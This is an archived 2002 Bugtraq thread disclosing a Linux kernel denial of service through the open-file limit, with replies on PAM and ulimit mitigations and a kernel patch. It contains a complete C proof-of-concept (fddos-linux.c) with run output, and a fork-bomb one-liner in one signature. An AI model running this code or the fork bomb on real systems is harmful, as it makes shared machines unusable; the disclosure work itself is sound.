8703560 2002-07-07 22:54 +0200  /115 rader/ Paul Starzetz <paul@starzetz.de>
Sänt av: joel@lysator.liu.se
Importerad: 2002-07-08  22:14  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern mottagare: vendor-sec <vendor-sec@lst.de>
Mottagare: Bugtraq (import) <22987>
Ärende: Linux kernels DoSable by file-max limit
------------------------------------------------------------
From: Paul Starzetz <paul@starzetz.de>
To: bugtraq@securityfocus.com, vendor-sec <vendor-sec@lst.de>
Message-ID: <3D28AA94.8030105@starzetz.de>

Hi,

the recently mentioned problem in BSD kernels concerning the global
limit of open files seems to be present in the Linux-kernel
too. However  as mentioned in the advisory about the BSD specific
problem the Linux  kernel keeps some additional file slots reserved
for the root user. This  code can be found in the fs/file_table.c
source file (2.4.18):

struct file * get_empty_filp(void)
{
    static int old_max = 0;
    struct file * f;

    file_list_lock();
    if (files_stat.nr_free_files > NR_RESERVED_FILES) {
    used_one:
        f = list_entry(free_list.next, struct file, f_list);

[...]

    /*
     * Use a reserved one if we're the superuser
     */
[*]  if (files_stat.nr_free_files && !current->euid)
        goto used_one;


Greping the source code (2.4.18) reveals that the limit is pretty low:

./include/linux/fs.h:#define NR_RESERVED_FILES 10 /* reserved for root */


The problem is obviously the checking for superuser privilege in the
[*]  line since every user can usually run some setuid binaries like
passwd  or su.

The attached code demonstrates the problem (you may need to change the 
EXECBIN and FREENUM parameters):

terminal1:

dummy:~ # id uid=0(root) gid=0(root)
groups=0(root),1(bin),14(uucp),15(shadow),16(dialout),17(audio),42(trusted),65534(nogroup)


terminal2:

paul@dummy:~> id
uid=500(paul) gid=100(users)
paul@dummy:~> ./fddos

preforked child 0

errno 24 pid 24087 got 1021 files
errno 24 pid 24088 got 1021 files
errno 24 pid 24089 got 1021 files
errno 24 pid 24090 got 1021 files
errno 24 pid 24091 got 1021 files
errno 24 pid 24092 got 1021 files
errno 24 pid 24093 got 1021 files
errno 23 pid 24094 got 807 files


file limit reached, eating some root's fd
freeing some file descriptors...

 pid 24094 closing 809
 pid 24094 closing 808
 pid 24094 closing 807
 pid 24094 closing 806
 pid 24094 closing 805
 pid 24094 closing 804
 pid 24094 closing 803
 pid 24094 closing 802
 pid 24094 closing 801
 pid 24094 closing 800
 pid 24094 closing 799
 pid 24094 closing 798
 pid 24094 closing 797
 pid 24094 closing 796
 pid 24094 closing 795
 pid 24094 closing 794
 pid 24094 closing 793

executing /usr/bin/passwd
Old Password:

start the fddos binary as non root user, then type on terminal1:

dummy:~ # id
bash: /usr/bin/id: Too many open files in system
dummy:~ # w
bash: /usr/bin/w: Too many open files in system

The system becomes unusable!


Solution: no temporary solution yet, there should be a global per user 
file limit, the reserved file descriptors should be given out under 
another uid/euid policy. The NR_RESERVED_FILES limit seems to me to be 
really low.

Exploitability to get uid=0 has not been confirmed yet but seems
possible.


regards,

/ih
(8703560) /Paul Starzetz <paul@starzetz.de>/(Ombruten)
Bilaga (text/plain) i text 8703561
Kommentar i text 8704211 av Kurt Seifried <bugtraq@seifried.org>
8703561 2002-07-07 22:54 +0200  /134 rader/ Paul Starzetz <paul@starzetz.de>
Bilagans filnamn: "fddos-linux.c"
Importerad: 2002-07-08  22:14  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern mottagare: vendor-sec <vendor-sec@lst.de>
Mottagare: Bugtraq (import) <22988>
Bilaga (text/plain) till text 8703560
Ärende: Bilaga (fddos-linux.c) till: Linux kernels DoSable by file-max limit
------------------------------------------------------------
#include <stdio.h>
#include <unistd.h>
#include <signal.h>
#include <fcntl.h>
#include <errno.h>



#define PREFORK 1
#define EXECBIN "/usr/bin/passwd"
#define FREENUM 18


static int fc = 0;
static int ec = 0;



void forkmore(int v)
{
    fc++;
}


void execmore(int v)
{
    ec++;
}


int main()
{
    int r, cn, pt[PREFORK];


    signal(SIGUSR1, &forkmore);
    signal(SIGUSR2, &execmore);
    printf("\n");

    for (cn = 0; cn < PREFORK; cn++) {
	if (!(r = fork())) {
	    printf("\npreforked child %d", cn);
	    fflush(stdout);
	    while (!ec) {
		usleep(100000);
	    }

	    printf("\nexecuting %s\n", EXECBIN);
	    fflush(stdout);

	    execl(EXECBIN, EXECBIN, NULL);

	    printf("\nwhat the fuck?");
	    fflush(stdout);
	    while (1)
		sleep(999999);
	    exit(1);
	} else
	    pt[cn] = r;
    }

    sleep(1);
    printf("\n\n");
    fflush(stdout);
    cn = 0;

    while (1) {
	fc = ec = 0;
	cn++;

	if (!(r = fork())) {
	    int cnt = 0, fd = 0, ofd = 0;

	    while (1) {
		ofd = fd;
		fd = open("/dev/null", O_RDWR);
		if (fd < 0) {
		    printf("errno %d ", errno);
		    printf("pid %d got %d files\n", getpid(), cnt);
		    fflush(stdout);

		    if (errno == ENFILE)
			kill(getppid(), SIGUSR2);
		    else
			kill(getppid(), SIGUSR1);

		    break;
		} else
		    cnt++;
	    }

	    ec = 0;

	    while (1) {
		usleep(100000);
		if (ec) {
		    printf("\nfreeing some file descriptors...\n");
		    fflush(stdout);
		    for (cn = 0; cn < FREENUM; cn++) {
			printf("\n pid %d closing %d", getpid(), ofd);
			close(ofd--);
		    }
		    ec = 0;
		    kill(getppid(), SIGUSR2);
		}
	    }

	} else {
	    while (!ec && !fc)
		usleep(100000);

	    if (ec) {
		printf("\n\nfile limit reached, eating some root's fd");
		fflush(stdout);

		sleep(1);
		ec = 0;
		kill(r, SIGUSR2);
		while (!ec)
		    sleep(1);

		for (cn = 0; cn < PREFORK; cn++)
		    kill(pt[cn], SIGUSR2);

		while (1) {
		    sleep(999999);
		}
	    }
	}
    }

    return 0;
}
(8703561) /Paul Starzetz <paul@starzetz.de>/--------
8704211 2002-07-08 16:30 -0600  /165 rader/ Kurt Seifried <bugtraq@seifried.org>
Sänt av: joel@lysator.liu.se
Importerad: 2002-07-09  00:57  av Brevbäraren
Extern mottagare: Paul Starzetz <paul@starzetz.de>
Extern mottagare: bugtraq@securityfocus.com
Extern mottagare: vendor-sec <vendor-sec@lst.de>
Externa svar till: bugtraq@seifried.org
Mottagare: Bugtraq (import) <22995>
Kommentar till text 8703560 av Paul Starzetz <paul@starzetz.de>
Ärende: Re: Linux kernels DoSable by file-max limit
------------------------------------------------------------
From: "Kurt Seifried" <bugtraq@seifried.org>
To: "Paul Starzetz" <paul@starzetz.de>, <bugtraq@securityfocus.com>,
 "vendor-sec" <vendor-sec@lst.de>
Message-ID: <001401c226cf$04b239b0$1400020a@chaser>

> Solution: no temporary solution yet, there should be a global per user
> file limit, the reserved file descriptors should be given out under
> another uid/euid policy. The NR_RESERVED_FILES limit seems to me to be
> really low.

Huh. Simply limit users, PAM provides this capability, as do most
shells.  From: http://seifried.org/lasg/users/

PAM Almost all Linux distributions ship with PAM support making it
universally available. PAM limits provide a single standardized
interface to setting user limits, instead of having to write complex
shell configuration files (such as /etc/profile) you simply edit the
"limits.conf" file. As well applying limits selectively through the
command shell is very difficult, whereas with PAM applying limits
globally, on groups or on individual users is quite
simple. Documentation is available on PAM usually in the
"/usr/share/doc/" tree. To enable PAM limits you need to add a line
such as:

session		required	/lib/security/pam_limits.so
to the appropriate Pam configuration file (i.e. /etc/pam.d/sshd). You can
then define limits, typically these are in "/etc/security/limits.conf" or a
similar location. Because most of these limits are enforced by the shell the
system cannot log all violations of limits (i.e. you will be notified in
syslog when a user exceeds the number of times they are allowed to login,
however you will not receive a warning if the user tries to use more disk
space then they are allowed to).

The available limits are:

  core -- Limits the core file size (KB); usually set to 0 for most users to
prevent core dumps.
  data -- Maximum data size (KB).
  fsize -- Maximum file size (KB).
  memlock -- Maximum locked-in-memory address space (KB).
  nofile -- Maximum number of open files.
  rss -- Maximum resident set size (KB).
  stack -- Maximum stack size (KB).
  cpu -- Maximum CPU time (MIN).
  nproc -- Maximum number of processes.
  as -- Address space limit.
  maxlogins -- Maximum number of logins for this user or group.
  priority -- The priority to run user process with.

For example you can limit the amount of memory that user "bob" is
allowed to use:

user		hard	memlock		4096
This would place a hard (absolute) limit of 4 megabytes on memory usage for
"bob". Limits can be placed on users by listing the user name, groups by
using the syntax "@group" or globally by using "*".

core files can be created when a program crashes. They have been used
in security exploits, overwriting system files, or by containing
sensitive information (such as passwords). You can easily disable
core dumps using PAM, and generally speaking most users will not
notice, however if you have software developers they may complain.

*		hard	core		0
fsize is generally a good idea to set, many users will have a large
filesystem quota (i.e. tens of megabytes to several hundred or several
gigabytes), however if they are allowed to create a single file that is
abnormally large they can easily hog disk I/O resources (i.e. create a large
file and copy/delete the copy repeatedly). Setting this limit globally can
also prevent an attacker from trying to fill up the partitions your log
files are stored on, for example if you only have a single / partition an
attacker can easily fill it up by generating a lot of log events.

@notroot	hard	data		102400
Of course limiting CPU time is one of the classic administrative tasks, this
is very useful for preventing run-away processes from eating up all the cpu
time, and it ensures that if a user leaves something running in background
(such as a packet sniffer) it will eventually be killed. Limiting CPU time
will have several side effects however, once of which will be limiting the
amount of time a user can spend logged in (eventually they will run out of
CPU time and the session will be killed), this can lead to problems if users
spend long periods logged in. As well depending on the CPU(s) present in
your machine the limits can vary greatly (one minute on a 386 is quite a bit
different then one minute on a 1.3 GHz Athalon).

@students	hard	cpu		2
Limiting the number of times a user can login is strongly advised, for most
situations users should not need to log in to a server more then once, and
allowing them to do so let's them use more resources then you might intend.
As well it can be used to detect suspicious activity, if users know they can
only login once then attempts to log in multiple times can be viewed as
suspicious activity (i.e. an attacker with a stolen password trying to
access the account).

@users		hard	maxlogins	1
Additionally when someone violated this limit it will be logged in syslog:

Apr 15 15:09:26 stench PAM_unix[9993]: (sshd) session opened for user
test by (uid=0) Apr 15 15:09:32 stench pam_limits[10015]: Too many
logins (max 1) for test Soft limit violations will not be logged
(i.e. a soft limit of 1 and a hard limit of 2).



Bash Bash has built in limits, accessed via "ulimit". Any hard limits
cannot be set higher, so if you have limits defined in /etc/profile,
or in the users .bash_profile (assuming they cannot edit/delete
.bash_profile) you can enforce limits on users with Bash shells. This
is useful for older Linux distributions that lack PAM support
(however this is increasingly rare and PAM should be used if
possible). You must also ensure that the user cannot change their
login shell, if they use "chsh" to change their shell to ksh for
example the next time they login they will have no limits (assuming
you cave not put limits on ksh). Documentation is available on
ulimit, log in using bash and issue:

[root@server /root]# help ulimit
ulimit: ulimit [-SHacdflmnpstuv] [limit]
    Ulimit provides control over the resources available to processes
    started by the shell, on systems that allow such control.  If an
    option is given, it is interpreted as follows:

        -S      use the `soft' resource limit
        -H      use the `hard' resource limit
        -a      all current limits are reported
        -c      the maximum size of core files created
        -d      the maximum size of a process's data segment
        -f      the maximum size of files created by the shell
        -l      the maximum size a process may lock into memory
        -m      the maximum resident set size
        -n      the maximum number of open file descriptors
        -p      the pipe buffer size
        -s      the maximum stack size
        -t      the maximum amount of cpu time in seconds
        -u      the maximum number of user processes
        -v      the size of virtual memory

    If LIMIT is given, it is the new value of the specified resource.
    Otherwise, the current value of the specified resource is
    printed.  If no option is given, then -f is assumed.  Values are
    in 1024-byte increments, except for -t, which is in seconds, -p,
    which is in increments of 512 bytes, and -u, which is an unscaled
    number of
    processes.  To disallow core files (by setting the maximum size
to 0) for example you would add:

ulimit -Hc 0 To set limits globally you would need to edit
"/etc/profile", of course this will also affect root, so be careful!
To set limits on groups you would need to add scripting to
"/etc/profile" that would check for the user's membership in a group
and then apply the statements, however doing this with PAM is
recommended as it is a lot simpler.





Kurt Seifried, kurt@seifried.org
A15B BEE5 B391 B9AD B0EF
AEB0 AD63 0B4E AD56 E574
http://seifried.org/security/
(8704211) /Kurt Seifried <bugtraq@seifried.org>/(Ombruten)
8708040 2002-07-09 11:35 +0200  /55 rader/ Aleksander Adamowski <olo@altkom.com.pl>
Sänt av: joel@lysator.liu.se
Importerad: 2002-07-09  20:19  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <23002>
Kommentar till text 8704211 av Kurt Seifried <bugtraq@seifried.org>
Ärende: Re: Linux kernels DoSable by file-max limit
------------------------------------------------------------
From: Aleksander Adamowski <olo@altkom.com.pl>
To: bugtraq@securityfocus.com
Message-ID: <3D2AAE7E.9020200@altkom.com.pl>

Kurt Seifried wrote:

>The available limits are:
>
>  core -- Limits the core file size (KB); usually set to 0 for most users to
>prevent core dumps.
>  data -- Maximum data size (KB).
>  fsize -- Maximum file size (KB).
>  memlock -- Maximum locked-in-memory address space (KB).
>  nofile -- Maximum number of open files.
>  rss -- Maximum resident set size (KB).
>  stack -- Maximum stack size (KB).
>  cpu -- Maximum CPU time (MIN).
>  nproc -- Maximum number of processes.
>  as -- Address space limit.
>  maxlogins -- Maximum number of logins for this user or group.
>  priority -- The priority to run user process with.
>  
>
from bash manual:
"The value of limit can be a number in the unit specified for the 
resource, or the value unlimited"

Having a fixed, absolute limit on: number, size, amount of resources
isn't very flexible - it's not dependent on current usage by other
users.

Now imagine there are 100 users of a system, all of them shouldn't be 
trusted and belong more or less to the same hash bucket (so you can't 
differentiate using per-group limits).
Now, suppose that some of them use the system frequently, some of them 
sporadically, some of them require as much resources as possible for 
their work, some don't need that much. You can't determine beforehand 
who will need what.

If you can't specify those limits so that they are relative to amount
of  resources available at the time of limit check, you're in problem
-  either you leave limits too high and one user can bring the
machine to  its knees, or you set the absolute limits and you start
getting calls  from frustrated users whose software doesn't work
because of those  limits being enforced.

Best regards,

-- 
    Olo
        GG#: 274614
        ICQ UIN: 19780575 
        http://olo.office.altkom.com.pl
(8708040) /Aleksander Adamowski <olo@altkom.com.pl>/(Ombruten)
8708093 2002-07-09 11:38 +0200  /30 rader/ Paul Starzetz <paul@starzetz.de>
Sänt av: joel@lysator.liu.se
Importerad: 2002-07-09  20:32  av Brevbäraren
Extern mottagare: Kurt Seifried <bugtraq@seifried.org>
Extern kopiemottagare: bugtraq@securityfocus.com
Extern kopiemottagare: vendor-sec <vendor-sec@lst.de>
Mottagare: Bugtraq (import) <23004>
Kommentar till text 8704211 av Kurt Seifried <bugtraq@seifried.org>
Ärende: Re: Linux kernels DoSable by file-max limit
------------------------------------------------------------
From: Paul Starzetz <paul@starzetz.de>
To: Kurt Seifried <bugtraq@seifried.org>
Cc: bugtraq@securityfocus.com, vendor-sec <vendor-sec@lst.de>
Message-ID: <3D2AAF30.5040200@starzetz.de>

Kurt Seifried wrote:

>>Solution: no temporary solution yet, there should be a global per user
>>file limit, the reserved file descriptors should be given out under
>>another uid/euid policy. The NR_RESERVED_FILES limit seems to me to be
>>really low.
>>    
>>
>
>Huh. Simply limit users, PAM provides this capability, as do most shells.
>From: http://seifried.org/lasg/users/
>  
>
Yes, but maybe the point of my original posting was not completely clear 
to everybody. Just look at the [*] line in the original post. The 
problem is the policy to give out the reserved file descriptors. 
Limiting users is a well known issue (to mostly everybody here I think) 
but sometimes it is not applicable or even not enough to prevent this 
kind of DoS.

regards,

Paul Starzetz
(8708093) /Paul Starzetz <paul@starzetz.de>/--------
8708129 2002-07-08 21:30 -0400  /64 rader/ Michal Zalewski <lcamtuf@coredump.cx>
Sänt av: joel@lysator.liu.se
Importerad: 2002-07-09  20:38  av Brevbäraren
Extern mottagare: Kurt Seifried <bugtraq@seifried.org>
Extern kopiemottagare: Paul Starzetz <paul@starzetz.de>
Extern kopiemottagare: bugtraq@securityfocus.com
Extern kopiemottagare: vendor-sec <vendor-sec@lst.de>
Mottagare: Bugtraq (import) <23005>
Kommentar till text 8704211 av Kurt Seifried <bugtraq@seifried.org>
Ärende: Re: Linux kernels DoSable by file-max limit
------------------------------------------------------------
From: Michal Zalewski <lcamtuf@coredump.cx>
To: Kurt Seifried <bugtraq@seifried.org>
Cc: Paul Starzetz <paul@starzetz.de>, <bugtraq@securityfocus.com>,
 vendor-sec <vendor-sec@lst.de> Message-ID:
<Pine.LNX.4.42.0207082112480.717-100000@nimue.bos.bindview.com>

On Mon, 8 Jul 2002, Kurt Seifried wrote:

> For example you can limit the amount of memory that user "bob" is allowed to
> use:
>
> user		hard	memlock		4096

Uhhh... not quite. Linux kernel does not really provide a nice way of
enforcing per-user limits by default, IIRC (unless something changed
in last few years ;-). Both PAM and 'ulimit' share essentially the
same interface, setrlimit(), that is mostly per-process, not
per-user. Some PAM extensions (such as the maximum number of logins)
are enforced on a per-user basis on a completely different
layer. Even if you use PAM to set a "memory limit for a group
'students'", you are essentially setting a memory limit for each
process of every person logged in that belongs to this group.

And they can still most likely bypass your limit by putting something
smart in their .procmailrc / .forward / .qmail, or in so many other
ways.

Linux limits are basically intended to prevent accidents from
happening (such as some clueless user testing the code I have in my
signature, why not... or a mail client gone bad and eating up all
memory).

There is very little you can do to change unless you make some
serious redesign and very precise kernel and user-space time and
resource control (with something like per-user-per-day CPU time /
file usage / memory usage limits, peak usage limit, limits for whole
groups of users, etc). In general, the reasonable assumption is that
your *users* would prefer to use the system instead of rendering it
unusable. If you have some mission critical tasks on the same machine
as some potentially malicious users, split it into two separate boxes
- simple. And on the box where you have malicious users, deploy some
fair time and resource sharing (perhaps a VM?;) or simply restrict
their rights to a very basic set of tools.

> core files can be created when a program crashes. They have been used in
> security exploits, overwriting system files, or by containing sensitive
> information (such as passwords).

Hm, yes and no. Linux behaves pretty well when it comes to core files
- privileged programs generally don't drop cores, cores don't follow
symlinks, etc, etc.

> Bash has built in limits, accessed via "ulimit". Any hard limits cannot be
> set higher, so if you have limits defined in /etc/profile, or in the users
> .bash_profile (assuming they cannot edit/delete .bash_profile) you can
> enforce limits on users with Bash shells.

Even if I do 'ssh user@host bash --norc --noprofile'?:-)

-- 
_____________________________________________________
Michal Zalewski [lcamtuf@bos.bindview.com] [security]
[http://lcamtuf.coredump.cx] <=-=> bash$ :(){ :|:&};:
=-=> Did you know that clones never use mirrors? <=-=
          http://lcamtuf.coredump.cx/photo/
(8708129) /Michal Zalewski <lcamtuf@coredump.cx>/(Ombruten)
8711522 2002-07-08 23:06 +0000  /153 rader/ <elv@openbeer.it>
Sänt av: joel@lysator.liu.se
Importerad: 2002-07-10  18:38  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <23008>
Ärende: Re: Linux kernels DoSable by file-max limit
------------------------------------------------------------
From: <elv@openbeer.it>
To: bugtraq@securityfocus.com
Message-ID: <20020708230601.19739.qmail@mail.securityfocus.com>

In-Reply-To: <3D28AA94.8030105@starzetz.de>

>Hi,
>
>the recently mentioned problem in BSD kernels 
concerning the global 
>limit of open files seems to be present in the Linux-
kernel too. However 
>as mentioned in the advisory about the BSD specific 
problem the Linux 
>kernel keeps some additional file slots reserved for 
>the root user.
[...]
>Greping the source code (2.4.18) reveals that the 
limit is pretty low:
>
>./include/linux/fs.h:#define NR_RESERVED_FILES 10 /* 
reserved for root */
>
>
>The problem is obviously the checking for superuser 
privilege in the [*] 
>line since every user can usually run some setuid 
binaries like passwd 
>or su.

hi all,

the obvious solution to this problem is a proper use 
of setrlimit() (ulimit):

>fddos output:

preforked child 0


errno 24 pid 896 got 29 files
errno 24 pid 897 got 29 files
errno 24 pid 898 got 29 files
errno 24 pid 899 got 29 files
errno 24 pid 900 got 29 files
errno 24 pid 901 got 29 files
errno 24 pid 902 got 29 files
errno 24 pid 903 got 29 files
errno 24 pid 904 got 29 files
errno 24 pid 905 got 29 files
errno 24 pid 906 got 29 files
errno 24 pid 907 got 29 files

>strace output:

[...]

preforked child 0rt_sigprocmask(SIG_BLOCK, [CHLD], 
[], 8) = 0
rt_sigaction(SIGCHLD, NULL, {SIG_DFL}, 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
nanosleep({1, 0}, {1, 0})               = 0
write(1, "\n\n\n", 3)                   = 3
fork()                                  = 913
errno 24 pid 913 got 29 files
[...]
fork()                                  = -1 EAGAIN 
(Resource temporarily unavailable)
nanosleep({0, 100000000}, NULL)         = 0
nanosleep({0, 100000000}, NULL)         = 0
[...]

elvinho ~ $ ulimit -Ha
core file size        (blocks, -c) 0
data seg size         (kbytes, -d) 6144
file size             (blocks, -f) 32768
max locked memory     (kbytes, -l) unlimited
max memory size       (kbytes, -m) 1024
open files                    (-n) 32
pipe size          (512 bytes, -p) 8
stack size            (kbytes, -s) 4096
cpu time             (seconds, -t) 300
max user processes            (-u) 16
virtual memory        (kbytes, -v) unlimited
elvinho ~ $

you can set an ulimit mask in /etc/login.defs


in this manner the problem is solved but the kernel
bug still remains, so two little pieces of code:

--- /usr/src/linux/fs/file_table.c	Mon Sep 17 
20:16:30 2001
+++ /usr/src/linux/fs/file_table.c	Mon Jul  8 
23:42:01 2002
@@ -51,9 +51,12 @@
 		return f;
 	}
 	/*
-	 * Use a reserved one if we're the superuser
+	 * Use one of the first 16 reserved fds if we 
have euid == 0 
+	 * and one of the second 16 reserved fds if 
we're the superuser
 	 */
-	if (files_stat.nr_free_files && !current-
>euid)
+	if (files_stat.nr_free_files > 
(NR_RESERVED_FILES/2) && !current->euid)
+		goto used_one;
+	else if (files_stat.nr_free_files <= 
(NR_RESERVED_FILES/2) && !current->uid)
 		goto used_one;
 	/*
 	 * Allocate a new one if we're below the 
limit.

--- /usr/src/linux/include/linux/fs.h	Mon Jul  1 
14:48:44 2002
+++ /usr/src/linux/include/linux/fs.h	Tue Jul  9 
00:07:06 2002
@@ -65,7 +65,7 @@
 extern int leases_enable, dir_notify_enable, 
lease_break_time;
 
 #define NR_FILE  8192	/* this can well be larger on 
a larger system */
-#define NR_RESERVED_FILES 10 /* reserved for root */
+#define NR_RESERVED_FILES 32 /* first 16 for euid == 
0 processes and second 16 only for root */
 #define NR_SUPER 256
 
 #define MAY_EXEC 1

we check if uid == 0 because suid bit cause the 
kernel to set the egid to the uid/gid of the binary 
owner:

[...]
                /* Set-uid? */
                if (mode & S_ISUID)
                        bprm->e_uid = inode->i_uid;
[...]
/usr/src/linux/fs/exec.c line 631 of 1071 (58%)


if someone can try to post these patches to the linux 
kernel ml it would be a good thing.

cheers, elv
(8711522) /<elv@openbeer.it>/-----------------------
8712572 2002-07-10 01:04 +0000  /24 rader/ Jim Breton <jamesb-bugtraq@alongtheway.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-07-11  01:32  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <23018>
Kommentar till text 8708129 av Michal Zalewski <lcamtuf@coredump.cx>
Ärende: Re: Linux kernels DoSable by file-max limit
------------------------------------------------------------
From: Jim Breton <jamesb-bugtraq@alongtheway.com>
To: bugtraq@securityfocus.com
Message-ID: <20020710010426083150.G1304@alongtheway.com>

On Mon, Jul 08, 2002 at 09:30:34PM -0400, Michal Zalewski wrote:
> And they can still most likely bypass your limit by putting something
> smart in their .procmailrc / .forward / .qmail, or in so many other ways.

One could use 'initscript' to plug many of those holes:

INITSCRIPT(5)  Linux System Administrator's Manual  INITSCRIPT(5)

NAME
       initscript - script that executes inittab commands.

SYNOPSIS
       /bin/sh /etc/initscript id runlevels action process

       When  the  shell  script  /etc/initscript is present, init
       will use it to execute the commands  from  inittab.   This
       script  can  be  used  to set things like ulimit and umask
       default values for every process.
(8712572) /Jim Breton <jamesb-bugtraq@alongtheway.com>/
8712885 2002-07-10 23:07 +0200  /89 rader/ Andrea Arcangeli <andrea@suse.de>
Sänt av: joel@lysator.liu.se
Importerad: 2002-07-11  06:29  av Brevbäraren
Extern mottagare: Paul Starzetz <paul@starzetz.de>
Extern kopiemottagare: bugtraq@securityfocus.com
Extern kopiemottagare: vendor-sec <vendor-sec@lst.de>
Mottagare: Bugtraq (import) <23022>
Kommentar till text 8703560 av Paul Starzetz <paul@starzetz.de>
Ärende: Re: Linux kernels DoSable by file-max limit
------------------------------------------------------------
From: Andrea Arcangeli <andrea@suse.de>
To: Paul Starzetz <paul@starzetz.de>
Cc: bugtraq@securityfocus.com, vendor-sec <vendor-sec@lst.de>
Message-ID: <20020710210741.GC1342@dualathlon.random>

On Sun, Jul 07, 2002 at 10:54:44PM +0200, Paul Starzetz wrote:
> Hi,
> 
> the recently mentioned problem in BSD kernels concerning the global 
> limit of open files seems to be present in the Linux-kernel too. However 
> as mentioned in the advisory about the BSD specific problem the Linux 
> kernel keeps some additional file slots reserved for the root user. This 
> code can be found in the fs/file_table.c source file (2.4.18):
> 
> struct file * get_empty_filp(void)
> {
>    static int old_max = 0;
>    struct file * f;
> 
>    file_list_lock();
>    if (files_stat.nr_free_files > NR_RESERVED_FILES) {
>    used_one:
>        f = list_entry(free_list.next, struct file, f_list);
> 
> [...]
> 
>    /*
>     * Use a reserved one if we're the superuser
>     */
> [*]  if (files_stat.nr_free_files && !current->euid)
>        goto used_one;
> 
> 
> Greping the source code (2.4.18) reveals that the limit is pretty low:
> 
> ./include/linux/fs.h:#define NR_RESERVED_FILES 10 /* reserved for root */

well, that's not really secure in the first place, I mean there's
nothing to exploit, it's more an hack to try to have more chances to
keep an usable machine as root after you hit the file-max, but it's
not guaranteed to work at all regardless of malicious or non
malicious workloads. Linux never enforce to keep the nr_free_files to
a level >= NR_RESERVED_FILES, it just tries to do that lazily, but
it's not guaranteed you will have any nr_free_files when you happen
to need them.

For example if you keep only opening files since boot and you never
execute a single close() or exit() syscall, you will never get any
nr_free_file available, so no matter who you are (root or not), you
will never pass this test "if (files_stat.nr_free_files &&
!current->euid)" because nr_free_files will be always zero.

Furthmore that part of the vfs file allocation management needs a
rewrite (hope it will happen in 2.5) and the file-max should go away
like the inode-max gone away too in 2.3. At the moment all released
files have no way to be releaed dynamically, and that's not
good. There should be a proper slab cache and the fput should
kmem_cache_free, instead of putting the file into the unshrinkable
"file_table.c::free_list". But this is more a linux-kernel topic...

After we make possible to shrink the released files, the file-max
limit can go away (we need it now or we can pin all the ram into this
not shrinkable "free_list"). Then if you allocate all the ram into
files you will run the machine oom at some point. Which moves the DoS
issues elsewere: in the memory management area, which becomes a
generic problem, not specific to the file allocations anymore. After
you hit the oom point, even if you could allocate the file with a
root-file-reserved-pool, still you may not be able to allocate the
dentry and the inode then.

Anyways regardless of the memory management oom possible DoSes (when
running out of ram resources), removing the file-max is a goodness
because it makes the usability of linux much better, if you need lots
of files in a temporarly spike of load, then you won't be left with
an huge leak of files hanging around the the vm will shrink them as
you need more ram later. And if you hit oom, it's very likely (though
not guaranteed, also considering the different algorithms to handle
oom conditions, some deadlock prone, some not deadlock prone) that
the offending task will be killed too rendering any malicious attack
much less reproducible than now.

> [..]
> Exploitability to get uid=0 has not been confirmed yet but seems possible.

If that's the case it's an userspace bug in the suid apps that you're
executing, certainly it's not a kernel issue.

Andrea
(8712885) /Andrea Arcangeli <andrea@suse.de>/(Ombruten)